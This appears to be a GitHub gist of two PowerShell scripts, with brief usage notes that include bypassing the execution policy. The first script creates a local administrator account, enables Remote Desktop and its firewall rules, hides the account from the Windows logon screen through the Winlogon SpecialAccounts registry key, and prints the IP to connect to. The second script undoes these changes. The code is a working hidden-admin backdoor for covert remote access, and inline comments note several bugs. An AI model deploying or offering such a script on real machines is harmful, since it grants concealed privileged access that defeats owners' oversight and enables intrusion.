@pr0way
Last active June 20, 2021 17:50
Script to create hidden user(s) to connect via remote desktop (local admin)

How to run this script?

In order to run this script, make sure you execute the following command first:

Set-ExecutionPolicy Bypass -Scope Process -Force

It lets you run any script during the current PowerShell session. If you close the PowerShell window, you'll have to invoke this command again.

Then you can finally run: .\HiddenAccounts.ps1

Alternatively : .\HiddenAccountsRemover.ps1

Good to know

  • The scripts do not verify the correctness of the password or username — not even the length is checked.
  • Be sure you aren't overwriting one of the Microsoft accounts — the name you enter can't be the same as an existing M$ one!

What does it look like?

Example

function Test-IsAdmin {
    # $true when the current process token is a member of the built-in
    # Administrators role, $false otherwise. Used as a guard because the
    # rest of the script writes to HKLM: and changes local group membership.
    $identity = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object Security.Principal.WindowsPrincipal($identity)
    return $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
}
# Abort unless the process is elevated: everything below writes under HKLM:
# and changes local group membership, which both need administrator rights.
if(!(Test-IsAdmin)){
Write-Warning "Try again, run with administrator privileges."
Exit
}
# Interactive inputs. The password is read as a SecureString, but as the TODO
# says neither value is validated (no length or character-set checks).
$Username = Read-Host -Prompt "Enter username"
$Password = Read-Host -AsSecureString -Prompt "Enter password" # TODO: Minimal require length!
# Splits the system locale's string form on whitespace and keeps the first
# three tokens, so $Lang is an array. The later `$Lang -eq 'pl-PL'` checks
# are therefore array comparisons (a filter) that are truthy only when
# 'pl-PL' is one of those tokens. Presumably the locale stringifies to its
# culture name such as "pl-PL" — confirm on the target PowerShell version.
$Lang = Get-WinSystemLocale | Foreach {($_ -split '\s+',4)[0..2]}
# Remembered so the provider location can be restored at the end, after the
# Set-Location calls into HKLM: below.
$DefaultPath = Get-Location
function GenMsg(){
    Param (
        [Parameter(Mandatory=$true)][string]$msg,
        [Parameter(Mandatory=$false)][bool]$warning,
        [Parameter(Mandatory=$false)][bool]$indent = $False
    )
    # Prints one progress line of the form "- [X] <msg>". The X is red when
    # $warning is set (step skipped or already in place) and green otherwise.
    # $indent prefixes a single space so sub-steps read as nested under the
    # previous line. Writes to the host only; nothing is returned.
    $lead = if ($indent) { " - [" } else { "- [" }
    $colour = if ($warning) { "Red" } else { "Green" }
    Write-Host $lead -NoNewline
    Write-Host "X" -ForegroundColor $colour -NoNewline
    Write-Host "] " -NoNewline
    Write-Host $msg
}
Write-Host "`nScript is running:"
# Create user
# Creates the account only when no local user already has exactly this name.
# -FullName and -Description are fixed placeholder strings, and nothing about
# the password is validated before the call.
$Users = Get-LocalUser | Where-Object {$_.Name -eq $Username}
if (-not $Users){
New-LocalUser $Username -Password $Password -FullName "Anonymous" -Description "Lorem Ipsum" | out-null
GenMsg "Create new user"
} else {
GenMsg "User with following name already exist" $True
}
# Add to group
# The Administrators group is looked up by its localized display name. Only
# the Polish name is special-cased, so on other non-English systems the
# lookup on the next line can fail to find the group.
$GroupName = If ($Lang -eq 'pl-PL') {"Administratorzy"} Else {"Administrators"}
# Counts local members whose name is COMPUTERNAME\username; 0 = not a member.
$UserInGroup = (Get-LocalGroupMember -Group $GroupName | Where-Object { $_.PrincipalSource -eq "Local" } | Where-Object { $_.Name -eq "$($env:computername)\$($Username)" }).Count
if($UserInGroup -eq 0){
Add-LocalGroupMember -Group $GroupName -Member $Username
GenMsg "Add user to local administrators group"
} else {
GenMsg "User exist in local administrators group" $True
}
# Allow to remote connections
# fDenyTSConnections is the Terminal Server "deny" flag: 1 = Remote Desktop
# connections refused, 0 = allowed. It is only flipped when currently 1.
$AllowRemote = (Get-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections").fDenyTSConnections
if($AllowRemote -eq 1){
# NOTE(review): there is no whitespace between the closing quote of the path
# and -Name on this line; the parser may fold "-Name" into the path argument.
# Verify this statement actually succeeds before relying on its message.
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-Name "fDenyTSConnections" -Value 0
GenMsg "Allow to remote connections"
} else {
# Same caption with the red marker: nothing was changed because the flag
# was already 0.
GenMsg "Allow to remote connections" $True
}
# Firewall rule group, again chosen by localized display name (pl-PL only).
$NetworkGroupName = If ($Lang -eq 'pl-PL') {"Pulpit Zdalny"} Else {"Remote Desktop"}
# One Enabled value per rule in the group; the group is enabled only when
# none of its rules is currently enabled.
$FirewallConfig = (Get-NetFirewallRule -DisplayGroup $NetworkGroupName).Enabled
if($FirewallConfig -notcontains $True){
Enable-NetFirewallRule -DisplayGroup $NetworkGroupName
GenMsg "Modify firewall configuration"
} else {
GenMsg "Modify firewall configuration" $True
}
# Make user hidden
# Winlogon\SpecialAccounts\UserList: a DWORD value named after an account and
# set to 0 hides that account from the logon and account-picker UI, which is
# the "hidden user" this script is named for. From a defensive standpoint,
# creation of this key or new values under it is a worthwhile signal to
# alert on in endpoint monitoring, since normal administration rarely
# touches it.
Set-Location -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
GenMsg "Edit registry"
if(Test-Path SpecialAccounts){
GenMsg "- [SpecialAccounts] key already exist" $True $True
} else {
# NOTE: the dash before Name here appears to be an en dash (U+2013), not an
# ASCII '-'. PowerShell's parser accepts it, but it may not survive
# copy-paste through other editors intact.
New-Item –Name SpecialAccounts | out-null
GenMsg "- [SpecialAccounts] key created successfully" $False $True
}
Set-Location -Path ".\SpecialAccounts"
if(Test-Path UserList){
GenMsg "- [UserList] sub-key already exist" $True $True
} else {
# Same en dash as above.
New-Item –Name UserList | out-null
GenMsg "- [UserList] sub-key created successfully" $False $True
}
# You can't hide main account -REPAIR
# NOTE(review): the existence check below reads the current key
# (SpecialAccounts), while the value is written under .\UserList on the
# following line, so the two paths differ. The value literal is wrapped in
# curly quotes (U+201D), which PowerShell treats as ordinary double quotes.
if((Get-ItemProperty . -Name $Username -ErrorAction SilentlyContinue) -eq $null){
New-ItemProperty -Path .\UserList -Name $Username -Value ”0” -PropertyType "DWord" | out-null
GenMsg "- [$($Username)] Added property in sub-key" $False $True
} else {
GenMsg "- [$($Username)] Entry was created before" $True $True
}
# First IPv4 address returned by Get-NetIPAddress. The ordering is not
# controlled here, so this may be a loopback or link-local address rather
# than the interface a remote client would actually reach.
$IPAddress = (Get-NetIPAddress -AddressFamily IPv4).IPAddress[0]
$Message = @"
######
## CONNECT WITH $($IPAddress)
######
"@
Write-Host $Message
# Return to where the script was started; the provider location was moved
# into HKLM: above.
Set-Location -Path $DefaultPath
function Test-IsAdmin {
    # $true when the current process token is a member of the built-in
    # Administrators role, $false otherwise. Guards the HKLM: edits and the
    # local-account removal that follow.
    $identity = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object Security.Principal.WindowsPrincipal($identity)
    return $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
}
# Abort unless elevated: deleting a local user and editing HKLM: both need
# administrator rights.
if(!(Test-IsAdmin)){
Write-Warning "Try again, run with administrator privileges."
Exit
}
# The account to remove; no validation beyond what Get-LocalUser does later.
$Username = Read-Host -Prompt "Input the username"
# First three whitespace-separated tokens of the system locale's string form,
# as an array; `$Lang -eq 'pl-PL'` below is thus an array filter that is
# truthy only when 'pl-PL' is among them. Presumably the locale stringifies
# to its culture name (e.g. "pl-PL") — confirm on the target version.
$Lang = Get-WinSystemLocale | Foreach {($_ -split '\s+',4)[0..2]}
# Set to $True only if the SpecialAccounts key is removed further down; it
# gates whether the remote-access settings are reverted.
$LastStage = $False
# Remembered so the provider location can be restored after the HKLM: edits.
$DefaultPath = Get-Location
function GenMsg(){
    Param (
        [Parameter(Mandatory=$true)][string]$msg,
        [Parameter(Mandatory=$false)][bool]$warning,
        [Parameter(Mandatory=$false)][bool]$indent = $False
    )
    # Emits one "- [X] <msg>" status line to the host. A red X means the step
    # was skipped or reported a problem; a green X means it ran. When $indent
    # is set the line is prefixed with one space to show it as a sub-step.
    # No return value.
    $prefix = if ($indent) { " " } else { "" }
    $markerColour = if ($warning) { "Red" } else { "Green" }
    Write-Host ($prefix + "- [") -NoNewline
    Write-Host "X" -ForegroundColor $markerColour -NoNewline
    Write-Host "] " -NoNewline
    Write-Host $msg
}
Write-Host "`nScript is running:"
# Check if following user exist
# Only local (non-Microsoft-account) users are considered. An exact name
# match is deleted immediately, with no confirmation prompt.
$User = Get-LocalUser | Where-Object { $_.PrincipalSource -eq "Local" } | Where-Object {$_.Name -eq $Username}
if ($User -ne $null){
Remove-LocalUser $User | Out-Null
GenMsg "User $($Username) was deleted."
} else {
GenMsg "Following user doesn't exist or username is incorrect" $True
}
# Info block
# Deliberately no Remove-LocalGroupMember call; this line only prints an
# informational marker. Presumably deleting the account already drops its
# group membership — confirm if the deletion above fails.
GenMsg "Omit removing from local administrators group"
# Undo hide user
# Reverse of the creator script: delete the per-user value under
# Winlogon\SpecialAccounts\UserList so the account is no longer hidden.
Set-Location -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
GenMsg "Edit registry"
# Leftover debugging lines from the author; kept commented out.
#$tmp = Get-ItemProperty -Path .\SpecialAccounts\UserList -Name $Username -ErrorAction SilentlyContinue
#Write-Host $tmp
if((Get-ItemProperty -Path .\SpecialAccounts\UserList -Name $Username -ErrorAction SilentlyContinue) -ne $null){
Remove-ItemProperty -Path .\SpecialAccounts\UserList -Name $Username
GenMsg "- [$($Username)] entry removed successfully" $False $True
} else {
GenMsg "- [$($Username)] entry was not found" $True $True
}
# Empty? Remove
# When no other values remain under UserList, delete the whole SpecialAccounts
# key (UserList with it) and remember that so the remote-access settings are
# reverted below. NOTE(review): if the key does not exist at all, Get-Item
# reports a non-terminating error and the .Count test does not short-circuit,
# so Remove-Item is still attempted — verify on a machine where the creator
# script was never run.
if((Get-Item .\SpecialAccounts\UserList).Property.Count -eq 0){
Remove-Item -Path .\SpecialAccounts -Recurse
GenMsg "- [UserList] sub-key was removed" $False $True
GenMsg "- [SpecialAccounts] key was removed" $False $True
$LastStage = $True
} else {
GenMsg "- [UserList] sub-key still exist" $True $True
GenMsg "- [SpecialAccounts] key still exist" $True $True
}
# Clean up everything
# Remote Desktop and the firewall group are reverted only when the registry
# key was removed in this run. Nothing records the pre-creation state, so
# when $LastStage is true RDP is disabled unconditionally, even if it had
# been enabled before the creator script was ever used.
if($LastStage){
# Disallow to remote connections
# fDenyTSConnections = 1 refuses Remote Desktop connections.
Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" -Value 1 | Out-Null
GenMsg "Disallow to remote connections"
# Revert firewall configuration
# Rule group chosen by localized display name; only pl-PL is special-cased.
if($Lang -eq 'pl-PL'){
Disable-NetFirewallRule -DisplayGroup "Pulpit Zdalny"
} else {
Disable-NetFirewallRule -DisplayGroup "Remote Desktop"
}
GenMsg "Revert firewall configuration"
} else {
# Red markers: the settings were intentionally left as they are because
# other hidden-account entries still exist.
GenMsg "Disallow to remote connections" $True
GenMsg "Revert firewall configuration" $True
}
$Message = @"
######################
#### USER REMOVED ####
######################
"@
Write-Host $Message
# Restore the provider location changed by the Set-Location into HKLM: above.
Set-Location -Path $DefaultPath